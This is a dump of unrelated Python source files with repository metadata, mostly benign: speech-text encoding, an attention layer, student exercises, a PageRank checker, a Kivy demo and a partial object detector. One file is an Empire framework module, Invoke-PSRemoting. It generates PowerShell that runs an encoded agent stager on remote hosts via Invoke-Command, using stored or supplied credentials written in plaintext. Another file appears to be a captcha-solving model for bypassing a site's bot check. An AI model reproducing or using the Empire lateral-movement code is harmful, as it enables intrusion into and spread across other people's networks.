_curly_re = re.compile(r'(.*?)\{(.+?)\}(.*)')
def text_to_sequence(text, cleaner_names):
  '''Converts a string of text to a sequence of IDs corresponding to the symbols in the text.

    The text can optionally have ARPAbet sequences enclosed in curly braces embedded
    in it. For example, "Turn left on {HH AW1 S S T AH0 N} Street."

    Args:
      text: string to convert to a sequence
      cleaner_names: names of the cleaner functions to run the text through

    Returns:
      List of integers corresponding to the symbols in the text
  '''
  sequence = []
  remaining = text
  while remaining:
    match = _curly_re.match(remaining)
    if match is None:
      # No more curly-brace groups: clean and encode the rest, then stop.
      sequence.extend(_symbols_to_sequence(_clean_text(remaining, cleaner_names)))
      break
    # Text before the braces is cleaned normally; the brace body is ARPAbet.
    sequence.extend(_symbols_to_sequence(_clean_text(match.group(1), cleaner_names)))
    sequence.extend(_arpabet_to_sequence(match.group(2)))
    remaining = match.group(3)
  return sequence
def sequence_to_ctc_sequence(sequence):
  """Map symbol IDs to CTC-alphabet IDs, dropping symbols outside the CTC set."""
  ctc_ids = []
  for sym_id in sequence:
    symbol = _id_to_symbol[sym_id]
    if symbol in ctc_symbols:
      ctc_ids.append(_ctc_symbole_to_id[symbol])
  return ctc_ids
def sequence_to_text(sequence):
  '''Converts a sequence of IDs back to a string'''
  parts = []
  for symbol_id in sequence:
    if symbol_id not in _id_to_symbol:
      continue  # silently skip IDs with no known symbol
    s = _id_to_symbol[symbol_id]
    # ARPAbet symbols are stored with a leading '@'; re-wrap them in braces.
    if len(s) > 1 and s[0] == '@':
      s = '{%s}' % s[1:]
    parts.append(s)
  # Adjacent ARPAbet groups are separated by a space instead of '}{'.
  return ''.join(parts).replace('}{', ' ')
def _clean_text(text, cleaner_names):
  """Run *text* through each named cleaner from the cleaners module, in order.

  Raises Exception('Unknown cleaner: ...') for an unrecognised name. Bug fix:
  the original called getattr without a default, which raised AttributeError
  first and made the intended `if not cleaner` check unreachable.
  """
  for name in cleaner_names:
    cleaner = getattr(cleaners, name, None)
    if not cleaner:
      raise Exception('Unknown cleaner: %s' % name)
    text = cleaner(text)
  return text
def _symbols_to_sequence(symbols):
  """Encode an iterable of symbols as IDs, skipping non-encodable symbols."""
  sequence = []
  for s in symbols:
    if _should_keep_symbol(s):
      sequence.append(symbol_to_id[s])
  return sequence
def _arpabet_to_sequence(text):
  """Encode space-separated ARPAbet tokens; they are stored with an '@' prefix."""
  prefixed = ['@' + token for token in text.split()]
  return _symbols_to_sequence(prefixed)
def _should_keep_symbol(s):
  """True for encodable symbols, excluding the '_' and '~' markers.

  Bug fix: the original used `s is not '_'`, an identity comparison against a
  string literal that only works by CPython interning accident (and emits a
  SyntaxWarning on modern Pythons); `!=` is the correct comparison.
  """
  return s in symbol_to_id and s != '_' and s != '~'
|
[
"[email protected]"
] | |
a0af01108c13fc966f89021c5c91150515e97d0d
|
b9c9215eb12ab8f0dcc4a5d964dc97ac2ad62257
|
/supervised_learning/0x11-attention/6-multihead_attention.py
|
76729225e985b407847cb68ae5dc2a513672b6cb
|
[] |
no_license
|
AndrewMiranda/holbertonschool-machine_learning-1
|
0318c2f45c863721b478acae26a5a874290e6445
|
e8a98d85b3bfd5665cb04bec9ee8c3eb23d6bd58
|
refs/heads/main
| 2023-01-19T00:34:15.264705 | 2022-07-25T15:10:43 | 2022-07-25T15:10:43 | 386,514,270 | 0 | 0 | null | 2021-07-16T04:58:08 | 2021-07-16T04:58:07 | null |
UTF-8
|
Python
| false | false | 3,218 |
py
|
#!/usr/bin/env python3
"""File that conatins the class MultiHeadAttention"""
import tensorflow as tf
sdp_attention = __import__('5-sdp_attention').sdp_attention
class MultiHeadAttention(tf.keras.layers.Layer):
    """Multi-head attention: projects Q/K/V, splits heads, applies scaled
    dot-product attention, and recombines the heads."""
    def __init__(self, dm, h):
        """
        Class constructor
        dm is an integer representing the dimensionality of the model
        h is an integer representing the number of heads
        dm is divisible by h
        Sets the following public instance attributes:
        h - the number of heads
        dm - the dimensionality of the model
        depth - the depth of each attention head
        Wq - a Dense layer with dm units, used to generate the query matrix
        Wk - a Dense layer with dm units, used to generate the key matrix
        Wv - a Dense layer with dm units, used to generate the value matrix
        linear - a Dense layer with dm units, used to generate the attention
        output
        """
        # Bug fix: tf.keras requires Layer.__init__ to run BEFORE sublayers
        # are assigned as attributes so they get tracked correctly; the
        # original called super() last, after creating the Dense layers.
        super(MultiHeadAttention, self).__init__()
        self.h = h
        self.dm = dm
        self.depth = dm // h
        self.Wq = tf.keras.layers.Dense(units=dm)
        self.Wk = tf.keras.layers.Dense(units=dm)
        self.Wv = tf.keras.layers.Dense(units=dm)
        self.linear = tf.keras.layers.Dense(units=dm)

    def call(self, Q, K, V, mask):
        """
        Public instance method
        Args:
        Q is a tensor of shape (batch, seq_len_q, dk) containing the input to
        generate the query matrix
        K is a tensor of shape (batch, seq_len_v, dk) containing the input to
        generate the key matrix
        V is a tensor of shape (batch, seq_len_v, dv) containing the input to
        generate the value matrix
        mask is always None
        Returns: output, weights
        output a tensor with its last two dimensions as (..., seq_len_q, dm)
        containing the scaled dot product attention
        weights a tensor with its last three dimensions as
        (..., h, seq_len_q, seq_len_v) containing the attention weights
        """
        def split_heads(x, batch_size):
            """Split the last dimension into (num_heads, depth).
            Transpose the result such that the shape is (batch_size,
            num_heads, seq_len, depth)"""
            x = tf.reshape(x, (batch_size, -1, self.h, self.depth))
            return tf.transpose(x, perm=[0, 2, 1, 3])

        batch_size = tf.shape(Q)[0]
        q = self.Wq(Q)  # (batch_size, seq_len, d_model)
        k = self.Wk(K)  # (batch_size, seq_len, d_model)
        v = self.Wv(V)  # (batch_size, seq_len, d_model)
        q = split_heads(q, batch_size)
        k = split_heads(k, batch_size)
        v = split_heads(v, batch_size)
        scaled_attention, attention_weights = sdp_attention(q, k, v, mask)
        # (batch, h, seq_len_q, depth) -> (batch, seq_len_q, h, depth),
        # then merge the head and depth axes back into dm.
        scaled_attention = tf.transpose(scaled_attention,
                                        perm=[0, 2, 1, 3])
        concat_attention = tf.reshape(scaled_attention, (batch_size, -1,
                                                         self.dm))
        output = self.linear(concat_attention)
        return output, attention_weights
|
[
"[email protected]"
] | |
0c24daedded2881c22f5beb167c8ee8b0efba4f0
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/55/usersdata/112/23295/submittedfiles/av2_p3_civil.py
|
190a7d9f68a0de2937c3818addab0a1181fc2f81
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 822 |
py
|
# -*- coding: utf-8 -*-
# Python 2 exercise script: reads a square matrix and a tower coordinate from
# stdin, then prints the matrix, the value at the tower, and a row sum.
from __future__ import division
import numpy as np
linhas=input('Digite a quandidade de linhas:')
a=np.zeros((linhas,linhas))
# Fill the matrix element by element from user input.
for i in range (0,a.shape[0],1):
    for j in range(0,a.shape[1],1):
        a[i,j]=input('Digite o termo:')
print a
x=input('Digite a coordenada x da localização da torre:')
y=input('Digite a coordenada y da localização da torre:')
def locali(a):
    # Returns the matrix value at the tower position; x and y are globals.
    # NOTE(review): the loops only re-evaluate a[x,y] and are effectively dead.
    for i in range (0,a.shape[0],1):
        for j in range (0,a.shape[1],1):
            a[x,y]
    return a[x,y]
print locali(a)
def soma_linha(a):
    # Sums each row of the matrix into s.
    # NOTE(review): the final loop rebinds c = s[y] every iteration, so the
    # function returns only row y's sum regardless of r — verify intent.
    s=[]
    for i in range (0,a.shape[0],1):
        soma=0
        for j in range (0,a.shape[1],1):
            soma=soma+a[i,j]
        s.append(soma)
    for r in range(0,len(s),1):
        c=s[y]
    return c
print soma_linha(a)
|
[
"[email protected]"
] | |
181d1d5084af6522c9e3c33e95be5e086608176e
|
a38b4c82feabe5be163ad2eeb5a46f38aeb88d77
|
/regressions/checkPageRank.py
|
6980c594526fb6e07683fdcf02458c065697e1c9
|
[
"Apache-2.0"
] |
permissive
|
zzmjohn/vertexAPI2
|
a9ae240c2fde55dc5be4a96f0017e8a2e204b258
|
cf59a50d1239f3ea892a7473f8175958c7ac0051
|
refs/heads/master
| 2020-12-29T01:23:04.602915 | 2013-12-16T18:32:17 | 2013-12-16T18:32:17 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,570 |
py
|
#!/usr/bin/python2
#script to compare pagerank outputs
import sys
from math import fabs
#load ranks for file fn
def load(f):
  """Parse lines of "<vertex-id> <value>" from *f* into an int -> float dict."""
  ranks = {}
  for line in f:
    vid_s, val_s = line.strip().split()
    ranks[int(vid_s)] = float(val_s)
  return ranks
def compare( tol_vals, tol_allowed, test, gold ):
  # Histogram the absolute test-vs-gold differences into buckets bounded by
  # tol_vals; histo_counts[0] counts diffs below tol_vals[0], the last bucket
  # counts diffs at or above tol_vals[-1]. Then check each bucket's fraction
  # against the allowed limits in tol_allowed.
  histo_counts = [0] * (len(tol_vals) + 1)
  for vid, val in test.items():
    try:
      diff = fabs( gold[ vid ] - val )
      # Linear scan downwards for the first threshold the diff falls under.
      pos = len(tol_vals) - 1
      while pos >= 0 and diff < tol_vals[pos]:
        pos -= 1
      histo_counts[pos + 1] += 1
    except KeyError:
      print "vid ", vid, " is in test but not in gold"
      #this is not an error, we just output all vertices
      #but powergraph does not
      #return False
  # Normalise counts to fractions of the test set and enforce the limits.
  totalItems = float(len(test))
  for idx in range(len(histo_counts)):
    histo_counts[idx] /= totalItems
    if histo_counts[idx] > tol_allowed[idx]:
      print "Percentage too high: ", tol_allowed[idx], histo_counts[idx]
      return False
  return True
if __name__ == '__main__':
  # Usage: checkPageRank.py <test-ranks-file> <gold-ranks-file>
  if len( sys.argv ) != 3:
    print "Usage: checkPageRank.py test gold"
    sys.exit(1)
  test = sys.argv[1]
  gold = sys.argv[2]
  td = load( open(test) )
  gd = load( open(gold) )
  #this means we allow up to 100% of values differing by less than .0001
  #.9% of values by more than .0001 and less than .001
  #.09% of values by more than .001 and less than .01
  #.009% of values by more than .01 and less than .1
  #0 values more than .1
  if not compare( [.0001, .001, .01, .1, 1, 10], [1., 1e-2, 5e-3, 5e-4, 5e-5, 5e-6, 0], td, gd ):
    sys.exit(1)
|
[
"[email protected]"
] | |
b5aab17911c032c7a93a159e063628fc4536e61e
|
bcb56cc126ea1885eb5ecc920884e2e331def045
|
/Part A/Déjà Vu.py
|
a510d4a81463d13148adb3624a1c08c02197962b
|
[] |
no_license
|
priyanshkedia04/Codeforces-Solutions
|
2d11cb7b8329fe658f983b7212c17fc89fd784f0
|
a5197c633bf4c3238f48bfb5b308144c2ffba473
|
refs/heads/main
| 2023-06-06T13:10:13.787843 | 2021-07-01T14:06:52 | 2021-07-01T14:06:52 | 382,000,707 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 222 |
py
|
# Codeforces "Déjà Vu": for each test case, insert an 'a' so the result is
# NOT a palindrome. Trying 'a' as a prefix and as a suffix covers all cases;
# if both stay palindromic, the string is all 'a's and there is no answer.
for _ in range(int(input())):
    s = input()
    with_suffix = s + 'a'
    with_prefix = 'a' + s
    if with_prefix != with_prefix[::-1]:
        print('YES')
        print(with_prefix)
    elif with_suffix != with_suffix[::-1]:
        print('YES')
        print(with_suffix)
    else:
        print('NO')
|
[
"[email protected]"
] | |
7e79b503b18d0387b9dfa5034bb0f9a4e2e53d84
|
48d1002394d233cf5932c7ef69300400af79118a
|
/examples/widgets/effectwidget.py
|
aeaf2d149fa96c8762405a9a404318773e80f479
|
[
"LGPL-2.1-only",
"MIT",
"Apache-2.0"
] |
permissive
|
kivy/kivy
|
ba2668bffe4e125fd1c5aace54f671343802850e
|
ca1b918c656f23e401707388f25f4a63d9b8ae7d
|
refs/heads/master
| 2023-09-04T02:27:05.311875 | 2023-08-26T08:00:20 | 2023-08-26T08:00:20 | 1,049,095 | 16,076 | 4,161 |
MIT
| 2023-09-09T07:55:18 | 2010-11-03T20:27:32 |
Python
|
UTF-8
|
Python
| false | false | 5,485 |
py
|
'''
Example usage of the effectwidget.
Currently highly experimental.
'''
from kivy.app import App
from kivy.uix.effectwidget import EffectWidget
from kivy.uix.spinner import Spinner
from kivy.uix.boxlayout import BoxLayout
from kivy.lang import Builder
from kivy.properties import ObjectProperty
from kivy.uix.effectwidget import (MonochromeEffect,
InvertEffect,
ChannelMixEffect,
ScanlinesEffect,
FXAAEffect,
PixelateEffect,
HorizontalBlurEffect,
VerticalBlurEffect)
class ComparisonWidget(EffectWidget):
    """EffectWidget whose canvas content comes from the kv rule below."""
    pass
class EffectSpinner(Spinner):
    """Spinner preloaded (via kv) with the available effect names."""
    pass
class SpinnerRow(BoxLayout):
    """A row of EffectSpinners that rebuilds its target widget's effect list."""

    effectwidget = ObjectProperty()

    # Spinner text -> effect class; 'none' and unknown values map to nothing.
    _EFFECT_CLASSES = {
        'fxaa': FXAAEffect,
        'monochrome': MonochromeEffect,
        'invert': InvertEffect,
        'mix': ChannelMixEffect,
        'blur_h': HorizontalBlurEffect,
        'blur_v': VerticalBlurEffect,
        'postprocessing': ScanlinesEffect,
        'pixelate': PixelateEffect,
    }

    def update_effectwidget(self, *args):
        """Recreate the effect chain from the spinners, left to right."""
        effects = []
        # children is in reverse add-order, so iterate it reversed.
        for spinner in reversed(self.children):
            effect_cls = self._EFFECT_CLASSES.get(spinner.text)
            if effect_cls is not None:
                effects.append(effect_cls())
        if self.effectwidget:
            self.effectwidget.effects = effects
example = Builder.load_string('''
#:import Vector kivy.vector.Vector
BoxLayout:
orientation: 'vertical'
FloatLayout:
ComparisonWidget:
pos_hint: {'x': 0, 'y': 0}
size_hint: 0.5, 1
id: effect1
ComparisonWidget:
pos_hint: {'x': pos_slider.value, 'y': 0}
size_hint: 0.5, 1
id: effect2
background_color: (rs.value, gs.value, bs.value, als.value)
SpinnerRow:
effectwidget: effect1
text: 'left effects'
SpinnerRow:
effectwidget: effect2
text: 'right effects'
BoxLayout:
size_hint_y: None
height: sp(40)
Label:
text: 'control overlap:'
Slider:
min: 0
max: 0.5
value: 0.5
id: pos_slider
BoxLayout:
size_hint_y: None
height: sp(40)
Label:
text: 'right bg r,g,b,a'
Slider:
min: 0
max: 1
value: 0
id: rs
Slider:
min: 0
max: 1
value: 0
id: gs
Slider:
min: 0
max: 1
value: 0
id: bs
Slider:
min: 0
max: 1
value: 0
id: als
<ComparisonWidget>:
Widget:
canvas:
Color:
rgba: 1, 0, 0, 1
Ellipse:
pos: Vector(self.pos) + 0.5*Vector(self.size)
size: 0.4*Vector(self.size)
Color:
rgba: 0, 1, 0.3, 1
Ellipse:
pos: Vector(self.pos) + 0.1*Vector(self.size)
size: 0.6*Vector(self.size)
Color:
rgba: 0.5, 0.3, 0.8, 1
Ellipse:
pos: Vector(self.pos) + Vector([0, 0.6])*Vector(self.size)
size: 0.4*Vector(self.size)
Color:
rgba: 1, 0.8, 0.1, 1
Ellipse:
pos: Vector(self.pos) + Vector([0.5, 0])*Vector(self.size)
size: 0.4*Vector(self.size)
Color:
rgba: 0, 0, 0.8, 1
Line:
points:
[self.x, self.y,
self.x + self.width, self.y + 0.3*self.height,
self.x + 0.2*self.width, self.y + 0.1*self.height,
self.x + 0.85*self.width, self.y + 0.72*self.height,
self.x + 0.31*self.width, self.y + 0.6*self.height,
self.x, self.top]
width: 1
Color:
rgba: 0, 0.9, 0.1, 1
Line:
points:
[self.x + self.width, self.y + self.height,
self.x + 0.35*self.width, self.y + 0.6*self.height,
self.x + 0.7*self.width, self.y + 0.15*self.height,
self.x + 0.2*self.width, self.y + 0.22*self.height,
self.x + 0.3*self.width, self.y + 0.92*self.height]
width: 2
<SpinnerRow>:
orientation: 'horizontal'
size_hint_y: None
height: dp(40)
text: ''
Label:
text: root.text
EffectSpinner:
on_text: root.update_effectwidget()
EffectSpinner:
on_text: root.update_effectwidget()
EffectSpinner:
on_text: root.update_effectwidget()
<EffectSpinner>:
text: 'none'
values:
['none', 'fxaa', 'monochrome',
'invert', 'mix',
'blur_h', 'blur_v',
'postprocessing', 'pixelate',]
''')
class EffectApp(App):
    """Demo app whose root widget is the kv tree built above."""
    def build(self):
        return example
# NOTE(review): runs on import; consider an `if __name__ == '__main__':` guard.
EffectApp().run()
|
[
"[email protected]"
] | |
219cef7e0bdb3c19ef844fd2b9f31656dcc58f07
|
2817ecd7e48c4decba12ee76e451727c1a6acf14
|
/scripts/legacy/survey_distribution.py
|
645981e58fef1bc3a1c76cafe786360c095677dc
|
[] |
no_license
|
schwa-lab/sharingnews
|
6fcef71c16a03fb3a4a56c11322ba5c8ceb59582
|
81c87176c7b37511f15a97189f03d90d5074d0fb
|
refs/heads/master
| 2021-01-16T21:46:23.108811 | 2018-02-12T06:33:30 | 2018-02-12T06:33:30 | 26,195,626 | 3 | 0 | null | 2018-02-12T06:33:16 | 2014-11-05T00:39:40 |
Python
|
UTF-8
|
Python
| false | false | 3,985 |
py
|
from __future__ import print_function, division
from collections import Counter, defaultdict
import operator
from likeable.cleaning import strip_subdomains
MONTH_FIELD = 1
def get_status_binary(l):
    """Return True iff the survey row's status field (column 8) is exactly '200'.

    Idiom fix: return the comparison directly instead of an if/else that
    returns True/False.
    """
    return l[8] == '200'
def get_status_group(l):
    """Bucket a survey row's status field (column 8) into ERR / HOME / Nxx."""
    status = l[8]
    # '<...>' and '-' mark fetch failures rather than HTTP statuses.
    if status.startswith('<') or status == '-':
        return 'ERR'
    # '200?' marks a redirect-to-homepage result.
    if status == '200?':
        return 'HOME'
    # Otherwise group by the leading digit: '404' -> '4xx', etc.
    return status[0] + 'xx'
def _norm_date(dt, n_months):
if n_months is None:
return
return (dt[:4] + '-' +
'%02d' % ((int(dt[5:7]) - 1) // n_months * n_months + 1))
def get_distribs(key_field, get_cat, n_months, weight=None):
    """Tally survey rows into per-(key, month-bucket) category distributions.

    key_field: column index used as the grouping key (e.g. a URL signature).
    get_cat:   function mapping a parsed row (list of fields) to a category.
    n_months:  month-bucket size passed to _norm_date (None = all time).
    weight:    optional {(key, month): weight} dict; each group's counts are
               normalised to fractions and scaled by its weight.
    """
    # Group survey by status (cat), sig (key) and date group
    distrs = defaultdict(Counter)
    for l in open('data/sample-survey-v2'):
        l = l.rstrip('\r\n').split('\t')
        dt = _norm_date(l[MONTH_FIELD], n_months)
        distrs[l[key_field], dt][get_cat(l)] += 1
    if weight is None:
        get_weight = lambda k: 1
    else:
        get_weight = weight.get
    for k in distrs:
        distr = distrs[k]
        w = get_weight(k) or 0  # HACK due to dirty data?
        total = sum(distr.values())
        # Replace raw counts with weighted fractions of the group total.
        distrs[k] = {c: w * n / total
                     for c, n in distr.items()}
    return distrs
def get_sig_weights(n_months):
    """Load {(signature, month-bucket): total frequency} from the URL
    signature frequency dump, skipping malformed rows."""
    # Get overall frequency for each key and date
    sig_weight = defaultdict(int)
    for l in open('data/url-sig-frequencies.txt'):
        l = l.rstrip('\r\n').split('\t')
        try:
            sig_weight[l[2], _norm_date(l[1], n_months)] += int(l[0])
        except (IndexError, ValueError):
            # Dirty data
            pass
    # Freeze the defaultdict so later missing-key lookups raise KeyError.
    sig_weight.default_factory = None
    return sig_weight
def _sig_to_domain(sig):
    """Reduce a URL signature to its host with subdomains stripped."""
    host = sig.split('/')[0]
    return strip_subdomains(host)
def regroup_by_domain(distrs):
    """Collapse per-signature distributions into per-domain ones by summing
    category counts for signatures that share a (domain, month) key."""
    out = defaultdict(lambda: defaultdict(float))
    for (k, m), distr in distrs.iteritems():
        for c, n in distr.iteritems():
            out[_sig_to_domain(k), m][c] += n
    return out
def get_all_cats(distrs):
    """Return the sorted union of category labels across all distributions."""
    cats = set()
    for distr in distrs.itervalues():
        cats.update(distr)
    return sorted(cats)
if __name__ == '__main__':
    import argparse
    ap = argparse.ArgumentParser()
    ap.add_argument('-m', '--month-quant', type=int,
                    help='Group this many months together (default, all time)')
    ap.add_argument('--by-sig', default=False, action='store_true')
    ap.add_argument('--use-end-sig', default=False, action='store_true',
                    help='Calculates status on the basis of likely canonical '
                    'URL signature')
    cat_opts = {
        'status-binary': get_status_binary,
        'status-group': get_status_group,
    }
    ap.add_argument('-c', '--cats', choices=cat_opts.keys(),
                    default='status-binary')
    args = ap.parse_args()
    n_months = getattr(args, 'month_quant', None)
    # Month buckets must tile the year evenly.
    if n_months is not None and 12 % n_months != 0:
        ap.error('--month-quant (-m) must divide into 12')
    sig_weight = get_sig_weights(n_months)
    key_field = 4  # start sig
    if args.use_end_sig:
        # First redistribute each start-signature's weight onto the end
        # (post-redirect) signatures it resolved to, then re-key by end sig.
        tmp = get_distribs(key_field, operator.itemgetter(7), n_months,
                           weight=sig_weight)
        sig_weight = defaultdict(float)
        for (start_sig, mo), distr in tmp.iteritems():
            for end_sig, n in distr.iteritems():
                sig_weight[end_sig, mo] += n
        key_field = 7  # end sig
    distrs = get_distribs(key_field, cat_opts[args.cats], n_months,
                          weight=sig_weight)
    if not args.by_sig:
        distrs = regroup_by_domain(distrs)
    # output: one TSV row per (key, month), one column per category
    all_cats = get_all_cats(distrs)
    print('key', 'month', *all_cats, sep='\t')
    for k, v in sorted(distrs.iteritems()):
        k = list(k)
        k.extend(v.get(c, 0) for c in all_cats)
        print(*k, sep='\t')
|
[
"[email protected]"
] | |
495ba133d20be9696a894db3f3accc2f2fd82015
|
326c6ad82d59bb7509c02c76695ea9035993da70
|
/lib/modules/powershell/lateral_movement/invoke_psremoting.py
|
4680387727765b745328f6c6d9f005817ee6c58e
|
[
"BSD-3-Clause"
] |
permissive
|
Arvanaghi/Empire
|
0c08bd7ddfba9be10e96bb0834b8ce3bc829059b
|
fd168ebf8acb1c2ee59d56f2c393ebd7a297603e
|
refs/heads/master
| 2021-01-20T14:15:34.864581 | 2017-08-05T17:51:44 | 2017-08-05T17:51:44 | 99,435,848 | 2 | 0 | null | 2017-08-05T16:50:16 | 2017-08-05T16:50:16 | null |
UTF-8
|
Python
| false | false | 5,441 |
py
|
from lib.common import helpers
class Module:
    """Empire module: executes a stager on remote hosts via PowerShell
    Remoting (Invoke-Command)."""

    def __init__(self, mainMenu, params=[]):
        # NOTE(review): mutable default `params=[]` follows the framework-wide
        # convention; the list is only read here, never mutated.

        # Module metadata consumed by the Empire menu system.
        self.info = {
            'Name': 'Invoke-PSRemoting',
            'Author': ['@harmj0y'],
            'Description': ('Executes a stager on remote hosts using PSRemoting.'),
            'Background' : False,
            'OutputExtension' : None,
            'NeedsAdmin' : False,
            'OpsecSafe' : True,
            'Language' : 'powershell',
            'MinLanguageVersion' : '2',
            'Comments': []
        }
        # any options needed by the module, settable during runtime
        self.options = {
            # format:
            #   value_name : {description, required, default_value}
            'Agent' : {
                'Description'   :   'Agent to run module on.',
                'Required'      :   True,
                'Value'         :   ''
            },
            'CredID' : {
                'Description'   :   'CredID from the store to use.',
                'Required'      :   False,
                'Value'         :   ''
            },
            'ComputerName' : {
                'Description'   :   'Host[s] to execute the stager on, comma separated.',
                'Required'      :   True,
                'Value'         :   ''
            },
            'Listener' : {
                'Description'   :   'Listener to use.',
                'Required'      :   True,
                'Value'         :   ''
            },
            'UserName' : {
                'Description'   :   '[domain\]username to use to execute command.',
                'Required'      :   False,
                'Value'         :   ''
            },
            'Password' : {
                'Description'   :   'Password to use to execute command.',
                'Required'      :   False,
                'Value'         :   ''
            },
            'UserAgent' : {
                'Description'   :   'User-agent string to use for the staging request (default, none, or other).',
                'Required'      :   False,
                'Value'         :   'default'
            },
            'Proxy' : {
                'Description'   :   'Proxy to use for request (default, none, or other).',
                'Required'      :   False,
                'Value'         :   'default'
            },
            'ProxyCreds' : {
                'Description'   :   'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
                'Required'      :   False,
                'Value'         :   'default'
            }
        }
        # save off a copy of the mainMenu object to access external functionality
        # like listeners/agent handlers/etc.
        self.mainMenu = mainMenu
        # Apply any supplied [Name, Value] parameter pairs onto the options.
        for param in params:
            # parameter format is [Name, Value]
            option, value = param
            if option in self.options:
                self.options[option]['Value'] = value

    def generate(self):
        # Builds the PowerShell command string that launches the stager on the
        # remote hosts via Invoke-Command; returns '' on any validation error.
        listenerName = self.options['Listener']['Value']
        userAgent = self.options['UserAgent']['Value']
        proxy = self.options['Proxy']['Value']
        proxyCreds = self.options['ProxyCreds']['Value']
        userName = self.options['UserName']['Value']
        password = self.options['Password']['Value']
        script = """Invoke-Command """
        # if a credential ID is specified, try to parse
        credID = self.options["CredID"]['Value']
        if credID != "":
            if not self.mainMenu.credentials.is_credential_valid(credID):
                print helpers.color("[!] CredID is invalid!")
                return ""
            (credID, credType, domainName, userName, password, host, os, sid, notes) = self.mainMenu.credentials.get_credentials(credID)[0]
            self.options["UserName"]['Value'] = str(domainName) + "\\" + str(userName)
            self.options["Password"]['Value'] = password
        if not self.mainMenu.listeners.is_listener_valid(listenerName):
            # not a valid listener, return nothing for the script
            print helpers.color("[!] Invalid listener: " + listenerName)
            return ""
        else:
            # generate the PowerShell one-liner with all of the proper options set
            launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
            if launcher == "":
                return ""
            else:
                # build the PSRemoting execution string
                computerNames = "\"" + "\",\"".join(self.options['ComputerName']['Value'].split(",")) + "\""
                script += " -ComputerName @("+computerNames+")"
                script += " -ScriptBlock {" + launcher + "}"
                if self.options["UserName"]['Value'] != "" and self.options["Password"]['Value'] != "":
                    # add in the user credentials
                    # NOTE(review): the plaintext password is interpolated
                    # directly into the PowerShell string without escaping;
                    # passwords containing '"' would break the command.
                    script = "$PSPassword = \""+password+"\" | ConvertTo-SecureString -asPlainText -Force;$Credential = New-Object System.Management.Automation.PSCredential(\""+userName+"\",$PSPassword);" + script + " -Credential $Credential"
                script += ";'Invoke-PSRemoting executed on " +computerNames +"'"
                return script
|
[
"[email protected]"
] | |
ac49ac9a742dde207c205fdf63ceaf884a3a20e3
|
70ed9ef2867b2c0ca96596f8fdd75c31af5ac116
|
/build/lib/ArticleSpider/zheye/__init__.py
|
83954ea69947cd42adcc0f1dd46ef9f117c78f71
|
[] |
no_license
|
nanmuyao/ArticleSpider
|
b24aef4bbd761951dd1bd450e49de8f40c96f289
|
a75cfaa028b1717636866b5833cdcaa29a2ec43a
|
refs/heads/master
| 2021-07-24T16:16:20.597430 | 2017-11-05T08:01:53 | 2017-11-05T08:01:53 | 109,280,103 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,802 |
py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Recognizing class
from sklearn.mixture import GaussianMixture
from PIL import Image
from ArticleSpider.zheye import util
import numpy as np
class zheye:
def __init__(self):
''' load model '''
import os
import keras
full_path = os.path.realpath(__file__)
path, filename = os.path.split(full_path)
self.model = keras.models.load_model(path +'/zheyeV3.keras')
def Recognize(self, fn):
im = Image.open(fn)
im = util.CenterExtend(im, radius=20)
vec = np.asarray(im.convert('L')).copy()
Y = []
for i in range(vec.shape[0]):
for j in range(vec.shape[1]):
if vec[i][j] <= 200:
Y.append([i, j])
gmm = GaussianMixture(n_components=7, covariance_type='tied', reg_covar=1e2, tol=1e3, n_init=9)
gmm.fit(Y)
centers = gmm.means_
points = []
for i in range(7):
scoring = 0.0
for w_i in range(3):
for w_j in range(3):
p_x = centers[i][0] -1 +w_i
p_y = centers[i][1] -1 +w_j
cr = util.crop(im, p_x, p_y, radius=20)
cr = cr.resize((40, 40), Image.ANTIALIAS)
X = np.asarray(cr.convert('L'), dtype='float')
X = (X.astype("float") - 180) /200
x0 = np.expand_dims(X, axis=0)
x1 = np.expand_dims(x0, axis=3)
global model
if self.model.predict(x1)[0][0] < 0.5:
scoring += 1
if scoring > 4:
points.append((centers[i][0] -20, centers[i][1] -20))
return points
|
[
"[email protected]"
] | |
0db2aa9ff306478ee3e5479f7c42bd343136846d
|
795f0081004920c15c178c43b00432cb8e7ca586
|
/controller/src/object_detection.py
|
3d2d3f1083a94ede6cb0ff9622c6d4a24be2a5ba
|
[] |
no_license
|
60alex60/ECE140aLab6
|
e6e9985a07e5615a5678d817cdfb031802322425
|
f966af1d7aa87ab9f602bd3ad3f4cdea13ee7421
|
refs/heads/master
| 2023-04-05T15:31:52.014565 | 2021-03-05T05:41:31 | 2021-03-05T05:41:31 | 353,224,446 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,292 |
py
|
import numpy as np
import cv2
import time
class ImgProc():
def __init__(self):
# read pre-trained model and config file
self.net = cv2.dnn.readNet("object_detection/yolov4-tiny.weights", "object_detection/yolov4-tiny.cfg")
# read class names from text file
self.classes = None
with open("object_detection/coco.names", 'r') as f:
self.classes = [line.strip() for line in f.readlines()]
# generate different colors for different classes
self.COLORS = np.random.uniform(0, 255, size=(len(self.classes), 3))
# function to get the output layer names
# in the architecture
def get_output_layers(self, net):
layer_names = net.getLayerNames()
output_layers = [layer_names[i[0] - 1] for i in net.getUnconnectedOutLayers()]
return output_layers
# function to draw bounding box on the detected object with class name
def draw_bounding_box(self, img, class_id, confidence, x, y, x_plus_w, y_plus_h):
label = str(self.classes[class_id])
color = self.COLORS[class_id]
cv2.rectangle(img, (x, y), (x_plus_w, y_plus_h), color, 2)
cv2.putText(img, label, (x - 10, y - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)
def detect_objects(self, img):
W = img.shape[1]
H = img.shape[0]
# create input blob
sz = (416, 416) # (224,224)
normalization = 1.0 / 255.0
blob = cv2.dnn.blobFromImage(img, normalization, sz, (0, 0, 0), True, crop=False)
# set input blob for the network
self.net.setInput(blob)
# run inference through the network
